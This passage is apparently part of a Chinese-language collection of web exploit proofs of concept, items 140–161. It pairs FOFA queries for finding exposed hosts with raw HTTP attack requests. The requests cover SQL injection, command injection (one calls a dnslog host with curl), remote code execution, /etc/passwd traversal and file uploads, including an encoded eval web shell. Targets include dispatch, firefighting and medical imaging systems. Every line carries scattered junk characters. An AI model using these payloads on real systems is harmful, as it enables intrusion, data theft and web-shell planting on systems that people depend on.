5 Z" O! _9 D) n& N' m6 w+ a- zHost: x.x.x.x3 P; @; m: h6 V, E/ w: t2 k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.08 H$ H5 Q) }/ l7 Y' |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! }' {. J& |- M4 ~# L GAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 x7 N, ]2 }9 f) g
Accept-Encoding: gzip, deflate, br
* h+ \. D P# A" o) O& L* ?' nConnection: close
8 s8 M3 l/ U* nCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk9 J& C8 c1 k; W2 p, j4 V
Upgrade-Insecure-Requests: 1
( ^6 z" K2 P9 g
/ ?7 H$ @9 T3 l+ h( E) P% H( r( W8 u6 g4 E" S- K
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
2 r6 J5 c) s; y, iCVE-2024-25662 z& U) z$ q V
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"0 w6 ~" _ m* j* f. i( H' p
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
; {; \3 ~9 K1 e0 e* z0 _0 zHost: x.x.x.x; L4 Z. v9 [1 ~7 j! E6 ^1 _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.05 c$ e* Z4 ?( D& C1 p$ t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, K; M7 n4 i2 B. i h' IAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 o& C* h+ f, A( ]: c# \
Accept-Encoding: gzip, deflate, br' l$ E6 X7 n5 Q9 K/ n' e. H
Connection: close! ]4 r; j: F) v1 V: b/ B; V( A- G3 J
Cookie: authcode=h8g9
+ P) l& Y7 }' h9 h7 ^Upgrade-Insecure-Requests: 1- Z% p# Y) B, [2 `
, N$ y" u+ R1 o, B& C- D \0 u
& p5 P3 X* Y4 }: U$ d$ F0 m141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
4 v9 }. D- ~; D( W" R9 Z* M0 kFOFA:body="指挥调度管理平台". Z9 ^4 @* n* g" }
POST /app/ext/ajax_users.php HTTP/1.1& `, c G1 O, w8 B( z
Host: your-ip9 N0 A- v; \3 N8 H8 V$ G) [7 V- e, _
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
- T( a! H8 Z5 |Content-Type: application/x-www-form-urlencoded
: `5 V9 \# E# W" N" q
( d+ d; X4 F6 u5 Y5 I6 M4 i. @3 c
9 |/ X; @& ^$ O4 M1 T$ C' B; e- i& s- zdep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -4 o# H) i, m, r
: n3 w5 G5 ^+ A( t
& A5 C$ l; T# r; B2 R142. CMSV6车辆监控平台系统中存在弱密码/ x' f. h! s) z# b) L6 T# q
CVE-2024-296660 ^% m7 d: z& B- l4 X6 [* e
FOFA:body="/808gps/"& {0 M3 j8 n) ?6 n$ M
admin/admin7 y; |0 z; ^3 B% T4 P" m7 J
143. Netis WF2780 v2.1.40144 远程命令执行: r" m, L( [! o& k
CVE-2024-25850" s, O$ H9 Z( m2 Z" L( P5 a2 V
FOFA:title='AP setup' && header='netis'8 z/ H1 w b9 f
PAYLOAD
" V0 r( X' e. O4 N/ G
; b# J# o2 V" b1 s4 A1 v. v144. D-Link nas_sharing.cgi 命令注入- F6 Y; ?5 f9 x1 s2 m9 ~
FOFA:app="D_Link-DNS-ShareCenter"" H2 t `3 v1 y
system参数用于传要执行的命令
* G! l# h! {1 pGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1/ }: ?; m' I/ ?
Host: x.x.x.x [8 Y! k4 K9 n# H* q
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0! ~2 t% W9 u g7 ~4 V) y k# n
Connection: close
r, M2 L. p- Y, |1 W3 mAccept: */*
4 e1 F% M* G1 q D7 l* ~- [Accept-Language: en5 E! g. Y7 _( g. n- L* T
Accept-Encoding: gzip7 W A; M+ K4 H% }. {
$ ^3 _6 V+ t1 f& _
! E. I- c7 y- @6 W145. Palo Alto Networks PAN-OS GlobalProtect 命令注入, g) |- t+ d( I/ J i- g
CVE-2024-34004 y8 J2 s# s* I7 Y
FOFA:icon_hash="-631559155"
8 _3 W& o5 E/ k( t" M. MGET /global-protect/login.esp HTTP/1.1% E% n4 T$ ?% P$ s+ a' {. M
Host: 192.168.30.112:1005! o5 l: a% x/ P+ ]# ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
! v. k* B7 Y) @3 P* ^2 OConnection: close
) V* t0 m1 g1 T2 kCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
0 ?: C7 K* l+ t6 ~: DAccept-Encoding: gzip
3 P; K* Y0 ]: {+ L% E, i' u2 z _' l) j! S% T8 J$ s
0 T0 K8 }4 F, r% g; L5 M* o
146. MajorDoMo thumb.php 未授权远程代码执行* t9 ~# U2 ]" C' x8 Z0 n! v* J- k. A9 Z$ C
CNVD-2024-02175
' i8 _. w: ~7 [: UFOFA:app="MajordomoSL"
1 ]5 q6 l' h* Z- UGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
$ u+ O9 h3 X) @# c8 v; LHost: x.x.x.x
- [- y( V) j: [- V9 C# QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84* R. R ?! `' J
Accept-Charset: utf-8. n/ S6 D" Q" ^& ?2 b
Accept-Encoding: gzip, deflate
3 u( d3 y5 @0 r# P, m0 e/ cConnection: close
) N1 U' u& S+ d1 } E! P. Y, Q. n. C0 C
1 H% C4 R; b/ `147. RaidenMAILD邮件服务器v.4.9.4-路径遍历# X( ?1 C) ]- D) M4 k3 ^" W
CVE-2024-32399! K! x! v5 b1 {* u+ C
FOFA:body="RaidenMAILD"" J3 O+ Q$ n; o; S/ J
GET /webeditor/../../../windows/win.ini HTTP/1.1
( G& A% E8 S8 {7 F" e1 VHost: 127.0.0.1:816 {- X: J! Q) B" {) L8 U( g
Cache-Control: max-age=0/ u3 F* J7 g9 Q0 Z, x
Connection: close
* T7 k9 U+ {8 ?/ ?' N. t0 I: x0 P: k5 k5 ^0 }
3 _" V' M& z" x/ W6 S148. CrushFTP 认证绕过模板注入
+ S8 G1 G, F+ ]# ?" M7 s9 mCVE-2024-4040
& C [, a8 |/ @" A$ B( mFOFA:body="CrushFTP"
: M: |2 b' G/ e( l: mPAYLOAD
% G7 A5 v# b' K+ A, G8 ]; A
) u, c9 G5 c0 f149. AJ-Report开源数据大屏存在远程命令执行
8 C' ^; l4 Y2 Z2 wFOFA:title="AJ-Report"6 q/ S* f- U% N; d( e; v. j; t% Z
& _0 D& y* C( P* o$ d& @& T' WPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
- [! \6 e: `; J( }4 `) N) D+ WHost: x.x.x.x
; @& r& D+ F% [6 j, H: q+ p: oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36! g3 @2 C- l0 c8 r3 t/ [6 r X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- j1 \& Q+ U- P: T4 a; z
Accept-Encoding: gzip, deflate, br% P# G4 C7 g# d6 [( \2 @; B( o1 k
Accept-Language: zh-CN,zh;q=0.9
2 _! v j" x5 j) vContent-Type: application/json;charset=UTF-8
: m; Y( @( g; t6 G+ JConnection: close
6 m2 T; R" t# _0 I
. D, J) }$ [9 V{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}( f9 a( t8 p6 a% N/ s- o
% d4 z6 f) r+ @* z: m# G150. AJ-Report 1.4.0 认证绕过与远程代码执行
/ ]0 W7 S: n) c8 \$ uFOFA:title="AJ-Report"
2 w% w6 d5 x2 v" G8 s, jPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
4 {/ Q, T7 Y l4 W7 `4 F5 THost: x.x.x.x; Z' ^! K$ E& L" ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
, [. r! h8 k. P1 w: W& y+ g& d: ~9 BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 ~' I/ x' E7 q* LAccept-Encoding: gzip, deflate, br
9 x: h0 I5 j8 e; `9 [Accept-Language: zh-CN,zh;q=0.9
! v4 Q. K/ n; m& gContent-Type: application/json;charset=UTF-8
; t$ y" |* y$ y( x2 Y$ LConnection: close6 m2 F: u% [+ ?
Content-Length: 339
# p7 E; b6 Q& E& V1 v$ a: I3 m9 K0 n: X4 C* x) M
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
& R4 w! i/ z9 k* P
2 H* h0 o/ h5 \. i- B
. ~$ U1 d% J& D) m( g151. AJ-Report 1.4.1 pageList sql注入
K% s+ x9 j" h/ D8 `) w8 ?FOFA:title="AJ-Report") K f- G6 R. J0 T" k) }
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1( R+ d. l9 H% N' O
Host: x.x.x.x* R: Q- C3 B7 w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! U: P1 S6 b' ?' X3 V% F" D
Connection: close
0 u& \0 s$ ]- P' L' _Accept-Encoding: gzip
# _) l& f( q; \. ]6 [4 K
1 [5 d" g, F. O h' v) V! `% y# O/ R7 s: n2 l
152. Progress Kemp LoadMaster 远程命令执行
- {+ p; v, _6 h0 w$ d, G* c, ]CVE-2024-12122 |9 T, q. R6 G9 Z) [; O% L
LoadMaster <= 7.2.59.2 (GA)
; M+ V& l1 `2 n- wLoadMaster<=7.2.54.8 (LTSF)) G1 {% k. z M, u+ D# \
LoadMaster <= 7.2.48.10 (LTS)
( q& Q: \# ^3 H/ h9 [/ h0 q. NFOFA:body="LoadMaster"" r) p5 \7 H9 E+ X) T. a
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码( G, g0 |0 O8 w6 C! `( [+ _8 s
GET /access/set?param=enableapi&value=1 HTTP/1.1
2 g: l# O; `% _7 e+ i( iHost: x.x.x.x
# X6 S9 E( O9 ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1) ]0 }1 h% h3 Z! r
Connection: close
6 {: s$ l9 M! K7 R! s8 x- `Accept: */*+ {) z# @5 \+ W& W+ _
Accept-Language: en
5 G# @! U( Y. S6 K6 {7 i2 VAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
( v( F- S- T0 ~Accept-Encoding: gzip$ K" _! B3 h. T7 ^( w9 l6 l
: f2 _# A. [- J* m' l; M; r8 o( T+ @+ Z% @5 j/ G' ^9 o
153. gradio任意文件读取) K/ p$ c2 V8 `, E
CVE-2024-1561FOFA:body="__gradio_mode__"$ w: n g9 t% J% Y
第一步,请求/config文件获取componets的id4 s, H8 P: ` }! ^" W$ b
http://x.x.x.x/config
* ~2 z. m0 F- u, k+ J5 _* b* v0 d2 O( _& t( ^, x& N4 Z1 m
" N \8 Y. n/ |- l/ O: h+ R* S
第二步,将/etc/passwd的内容写入到一个临时文件5 D* r8 ?! d) H' n2 o" P& s
POST /component_server HTTP/1.1
6 W f2 g# z9 nHost: x.x.x.x1 }7 i3 G; }! s
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
! M6 B" U! `1 H( iConnection: close
7 Y8 o; T. N: X1 @Content-Length: 115
, _1 {8 [% Q( c5 {" y/ j; |2 NContent-Type: application/json0 |$ X; |0 ^* R1 V: U" s. H& h
Accept-Encoding: gzip
y: u: y! o! B8 t9 k" _) U& j* R1 \" g3 {! H
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
, D9 C# l4 w6 K7 v- g
. t7 V; m# J- F! H# e3 |# L# P
" H. E v, Q2 s; c: Q第三步访问
, o/ D$ G5 B' x& u6 l, ghttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd# e; A2 @9 N% A! e ` x
. e4 o/ I! y6 |4 i" |( | @
9 v: y. Y& ^5 z2 g
154. 天维尔消防救援作战调度平台 SQL注入
4 e( I# Z1 P% ]2 d4 X5 }CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
) {/ r- \- `" ~; r& k# vPOST /twms-service-mfs/mfsNotice/page HTTP/1.14 Z, j9 j6 Z2 b9 Q
Host: x.x.x.x( ~0 B3 K1 w" v" d8 L. l
Content-Length: 106/ j8 D' D1 m0 O9 O+ W" J
Cache-Control: max-age=0
$ e, N% P$ r( [5 ~2 Z7 a' ?Upgrade-Insecure-Requests: 1
% W& I3 _% K& l. s2 ?3 NOrigin: http://x.x.x.x
8 k3 r) Q$ ?" a9 Y1 MContent-Type: application/json% h. P; t3 n, v8 X" {) e, K- T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
$ G( \( [, n, @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! `5 F s, q& ?* t1 p" }
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page2 ]6 o4 y1 Y7 ?/ j- g6 P. h0 X
Accept-Encoding: gzip, deflate/ c; I! }* E- T0 ~2 C# Y
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.79 R- c5 V! P& t7 W
Connection: close
8 V" `: [; Z- Q, p- A& k2 I
+ Y0 W) J, N/ D7 \{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}/ Y2 S! a& A, D" Y2 n- v
" X; q* T- z- v3 |/ L }; K! s' R5 h2 l6 ?
155. 六零导航页 file.php 任意文件上传: I' S: _6 @4 [, m5 w% s+ I
CVE-2024-34982
$ ~+ v. t5 D' {FOFA:title=="上网导航 - LyLme Spage"
. w R5 V7 I7 C8 b0 K/ DPOST /include/file.php HTTP/1.1 H1 B ?; q6 J) G3 T
Host: x.x.x.x( {$ \' E/ F. d3 N p! }* T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0% g4 B* G2 z# Q# r7 S1 }$ g
Connection: close* q( x: i3 y4 a4 Z3 c; N4 O
Content-Length: 232
/ K3 `. r" c4 p1 j2 r4 N$ J- OAccept: application/json, text/javascript, */*; q=0.016 o; x0 n, e: F [
Accept-Encoding: gzip, deflate, br7 y9 G( w; i$ y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 [5 G9 j3 A$ q1 z9 ]" R; X5 |
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
5 L+ d8 a, G4 L/ ]( RX-Requested-With: XMLHttpRequest
5 v5 i5 q! G8 u ^7 r4 v2 ]1 t3 Y7 q8 I% g( k5 o% {# c; y* V
-----------------------------qttl7vemrsold314zg0f& m" z+ G G: l3 |2 p
Content-Disposition: form-data; name="file"; filename="test.php"
5 }6 O5 N, z7 }7 H% x( HContent-Type: image/png& ^! i5 o+ q5 t/ S
7 |9 ^- z3 }: U5 o
<?php phpinfo();unlink(__FILE__);?>' _; q g! p* y h
-----------------------------qttl7vemrsold314zg0f--) p1 [* F0 o0 h; N6 c
6 g' E; V3 v+ I" _+ G! H% T9 E; p5 w# A6 Z
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
/ v7 G4 Y4 a0 U( K( S7 s/ @
* r' E$ Q+ r8 B6 A" b: j156. TBK DVR-4104/DVR-4216 操作系统命令注入6 `, S8 L0 c6 B6 l" o; ]
CVE-2024-3721, u: \5 U! r7 N6 n7 `
FOFA:"Location: /login.rsp"
* B9 a* G, e Q! {& d8 X·TBK DVR-4104
! k. W! y' ~7 v0 E' A·TBK DVR-4216
k! ~. i! Z9 g& e/ wcurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1", V* L# w3 R: w4 m$ B7 k) q" T- Y, Q
6 _! w" `% \- f. W* Q0 h$ M
+ z6 G" s! p4 F; ePOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1. C% E, ^: U" o7 {& `& u
Host: x.x.x.x/ w9 \) M. o# B: D# B, ~. q
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
, @/ E1 |1 h7 e$ C6 L) i1 KConnection: close
5 p B5 ~8 G& s" b0 B5 `Content-Length: 0! O, w# J$ c5 K% b( N. b0 P
Cookie: uid=1
/ D0 ]" Z; i+ d7 {2 e* V: D, kAccept-Encoding: gzip
; ^1 g4 x! @4 V8 g% t8 o2 c% X" M8 J
. ^6 \9 z/ ], ~+ e C157. 美特CRM upload.jsp 任意文件上传" M; G" l) h! _6 w
CNVD-2023-069710 G- X0 r; U6 t. X6 ?9 s- y
FOFA:body="/common/scripts/basic.js"4 r( s6 m! F4 e" \3 _
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
7 P9 [0 Q t6 r6 n- o* SHost: x.x.x.x
$ j+ X2 d* L$ J- h/ _' GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
# l* P/ r4 f1 ?Content-Length: 7093 K- S. a0 b0 [+ ]2 u! X7 U4 |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 A- f0 l9 s2 Z
Accept-Encoding: gzip, deflate! Z: a, i6 C# u3 o+ X9 X
Accept-Language: zh-CN,zh;q=0.94 T6 K+ i' U D! B
Cache-Control: max-age=0
8 P: J6 K j! ^5 rConnection: close$ o( L, F: B( r: p) N8 k
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
; \+ l5 ^) Z n% N3 |2 I$ WUpgrade-Insecure-Requests: 1
& n. f& [. C- p% x* H. o9 x
2 a# S% M$ F& V( B. B: L ~' G------WebKitFormBoundary1imovELzPsfzp5dN- S& o2 y8 S+ e4 |7 a* b" H9 R" d
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
5 F( H1 p" w. A$ XContent-Type: application/octet-stream* Q; T9 s6 N# o* g
9 e& g5 b' `& B. T: \3 ]. |: e
nyhelxrutzwhrsvsrafb Q# S# j& ^( t4 ^9 Y7 C: B
------WebKitFormBoundary1imovELzPsfzp5dN
! q7 V! ` r6 d1 g; N M* i" s$ a9 uContent-Disposition: form-data; name="key"
6 T( |9 j9 l9 {6 m1 V8 p% C0 W2 f
+ R7 {8 K* T3 |& @, unull$ ?" N7 a; O% `7 ~
------WebKitFormBoundary1imovELzPsfzp5dN3 h9 X% o" H' z' R0 h; H
Content-Disposition: form-data; name="form" j- Z8 Y, W$ G0 y) X
" G7 V/ y2 X" o. Y* y9 v
null1 T' }8 [3 W& l' Z. K1 O0 l
------WebKitFormBoundary1imovELzPsfzp5dN
1 ]% C' e, F4 ~9 LContent-Disposition: form-data; name="field"
6 ^2 O7 `' Q) s$ {" ^. J: _) u) n1 y5 A* Z* k
null5 f- Z, Y3 \5 B
------WebKitFormBoundary1imovELzPsfzp5dN+ _+ a; n1 m9 A- V
Content-Disposition: form-data; name="filetitile"# i* k6 ]% z# Z7 A
4 [& F( }1 u2 n. F7 Wnull
. p0 O' ?5 q1 n" m------WebKitFormBoundary1imovELzPsfzp5dN! S5 n* T4 Q4 h b
Content-Disposition: form-data; name="filefolder" ^! h0 K0 ~- g4 r6 N/ E2 P# v2 u
. R: s& y. ~1 R0 Q9 I( T: Y `& wnull! i: g" h( ~. s5 C. K* S8 I( t( Y. |
------WebKitFormBoundary1imovELzPsfzp5dN--
$ a( h, F% S, y$ J
* p( `5 r( W- [' d3 n& N8 @$ }+ M4 n2 z/ ^2 f9 @, U
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
' T/ e- b, S- ~3 u( h2 _6 @2 x' Q9 Z& ^* T# A/ h
158. Mura-CMS-processAsyncObject存在SQL注入! z2 A4 y+ Q: |4 j9 G9 |
CVE-2024-32640
1 B& t* p6 ~4 ~' f9 s. z7 M7 }FOFA:"Generator: Masa CMS"
0 R' K0 {9 S. R# k' `4 YPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1+ @: h/ ^- e1 D$ P
Host: {{Hostname}}
6 ?8 [$ D* U# ^9 r0 k# I2 \Content-Type: application/x-www-form-urlencoded
* R1 J9 ?9 r+ o& V) J. ?; f6 R- t1 }8 J" Y: j
object=displayregion&contenthistid=x\'&previewid=1
" r2 u( \1 l1 K, O% H- G9 |% o' _2 |4 H2 m* Y
+ r7 Z& G6 M# ^1 I( {! Q
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传% U- {1 s& P q8 r8 w
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
8 `/ l9 [* }+ B5 } b3 IPOST /webservices/WebJobUpload.asmx HTTP/1.1
5 a) z* D. G9 r) G7 z) c) zHost: x.x.x.x
5 e$ _, A& u7 ?; ?1 S; y$ h% _/ VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
; Q. \! z* k% _' t6 y2 m7 xContent-Length: 1080
! _, x4 {' }5 c2 a: `' N1 R X7 hAccept-Encoding: gzip, deflate8 k9 R4 D4 F+ m+ f
Connection: close& K( W+ @( y3 O: K
Content-Type: text/xml; charset=utf-8
. k, k7 V2 R$ R S$ o) dSoapaction: "http://rainier/jobUpload"! ]7 \3 |0 Y! {' c
8 B4 V- t0 D+ |' T+ Y' K2 l& c! Q+ H<?xml version="1.0" encoding="utf-8"?>
& q: F( j4 B6 w& X) [<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
) t) E0 ~& Y; h7 Z c( o<soap:Body>. l: P: R; G8 f& k
<jobUpload xmlns="http://rainier"> b1 C" a" N: D% i' K
<vcode>1</vcode> r: d8 n3 G4 \+ }- m5 L9 |! I6 }
<subFolder></subFolder>
+ Z& F- `/ t9 ]0 _1 X<fileName>abcrce.asmx</fileName>
/ X) O& W) K; b; I' v1 z<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
4 Q: @$ w8 `1 \4 K& r* [</jobUpload>
2 _0 O1 T' h" c# l; p* V# e</soap:Body>, Y8 Y0 @( W5 c% x
</soap:Envelope>
7 X4 X8 O- {6 O2 [
( l* Y: \- j0 j0 i& w6 X& y# J
) P) _2 Y9 D/ @9 I) j# X9 j# B/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")% f [+ t# U! T+ B
% _, c6 X+ u( [8 Q2 |
{6 X+ G$ W2 m160. Sonatype Nexus Repository 3目录遍历与文件读取: m8 t9 B, u1 h% V- J: S
CVE-2024-4956
3 A7 t/ _' ?( s+ P* B- h, LFOFA:title="Nexus Repository Manager"
+ X* G( L2 r) BGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1+ ~, d/ O( v( [- r
Host: x.x.x.x
6 Q/ V/ T: O+ }User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
1 K( c- A. Y$ D$ yConnection: close
/ I8 O t3 t* ^0 N( v/ yAccept: */*# `* U! H0 \ l- h6 Y
Accept-Language: en
) z2 C D( W2 d) k X6 xAccept-Encoding: gzip, B. A3 s* y% |4 Z0 }$ k! R6 k
9 {* X% C& P& K( q9 @! s( t
- s7 L2 T! t6 J161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传; s @" ~! p- }! T/ j8 K
FOFA:body="/KT_Css/qd_defaul.css"+ t* c& g0 j" j
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密- ~3 I; A/ n5 H7 U. d; S7 n! g
POST /Webservice.asmx HTTP/1.1% n: W+ P4 Z% X0 S- @
Host: x.x.x.x
/ I H! q5 ?/ \4 y, eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.367 y% a3 q5 ?1 r# E, l9 M( ^
Connection: close5 ~9 c. N% @& W4 X
Content-Length: 445, [. S1 a' M6 y
Content-Type: text/xml
$ `2 s9 {5 i0 vAccept-Encoding: gzip
/ Z5 D2 C+ \+ t$ H
8 z# g3 Z; u% _) G; B<?xml version="1.0" encoding="utf-8"?>
, z) x: T6 p+ h- J& t8 `<soap:Envelope xmlns:xsi="
7 @* j$ x6 @7 H4 T8 Nhttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
0 `" O+ S" {/ U4 o+ qxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
1 u8 M7 _' z" w( q: z<soap:Body>
4 A' G8 s3 J! {$ h1 h8 u1 r<UploadResume xmlns="http://tempuri.org/">2 T- @! g9 A/ W6 S' p: `5 n
<ip>1</ip>
4 `, G9 y# X* j- w<fileName>../../../../dizxdell.aspx</fileName> F( O5 q' V1 U( D- `" y, D
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
7 t3 i4 V4 p8 O<tag>3</tag>
& h( X5 N( `" a" G5 ? W. L</UploadResume>
! t" T0 \" u. |</soap:Body>
- Z7 k. v+ a9 d o8 {' e* Q</soap:Envelope>
$ X: ], \7 {$ C3 U7 r
